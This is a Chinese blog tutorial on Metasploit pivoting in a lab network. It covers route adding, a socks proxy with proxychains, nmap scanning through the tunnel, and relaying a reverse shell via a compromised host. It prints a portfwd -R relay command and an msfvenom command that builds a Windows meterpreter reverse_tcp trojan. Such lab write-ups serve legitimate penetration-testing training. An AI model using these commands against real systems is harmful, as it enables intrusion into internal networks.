msf 代理和转发

简介

本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的

网络拓扑图如下

在这里插入图片描述

根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。

以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用

  • 添加路由
  • 端口转发
  • 反向代理

添加路由 ,适用于初始的跨网段代理

端口转发,适用于访问特定目标的代理

反向中继, 需要通过特定的服务器才能反射出来。

实验

首先我们可以通过ifconfig之类的命令以及其他模块得知服务器拥有两块网卡,可以访问两个网段,我们首先可以使用主机发现的模块对两个网段中的存活主机进行探测

post/windows/gather/arp_scanner 可以跨网段使用的arp ,设置session ,这里的254和255两个IP应该是因为虚拟环境的原因才存在的,

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

然后添加路由,这样msf框架中的模块就可以直接访问到之前访问不到的地址了,最后一个值是sessions ID

在这里插入图片描述

在这里插入图片描述

192.168.74.133和192.168.74.141是我们计划攻击的主机,在完成主机探测之后,进行端口存活探测。可以使用tcp的端口扫描模块来进行扫描。

在这里插入图片描述

在这里插入图片描述

也可以设置socket 代理结合proxychains使用msf的外部攻击进行探测。

修改proxychains的配置 配置文件位置 /etc/proxychains.conf, 其中的端口要与msf 中的模块的端口设置相同
在这里插入图片描述

使用proxychains代理nmap 进行扫描。

在这里插入图片描述

使用攻击模块,直接获取192.168.220.133的shell,这个metasploit的靶机,所以很简单

在这里插入图片描述

可以看到他是通过session的隧道生成的新的session

中继

我们让服务器C反向链接攻击机,但是由于服务器C 无法直接访问攻击机,所以需要通过服务器A进行中继

首先攻击机设置handler监听,这里监听的是5555端口

在这里插入图片描述

在session1 中设置端口转发

portfwd -R -L 192.168.220.129 -l 5555 -p 6666

生成对应的木马

在这里插入图片描述

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.74.140 LPORT=6666 -f exe -o /root/22.exe

运行木马可以成功让机器上线

在这里插入图片描述

参考

https://medium.com/axon-technologies/how-to-implement-pivoting-and-relaying-techniques-using-meterpreter-b6f5ec666795

  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值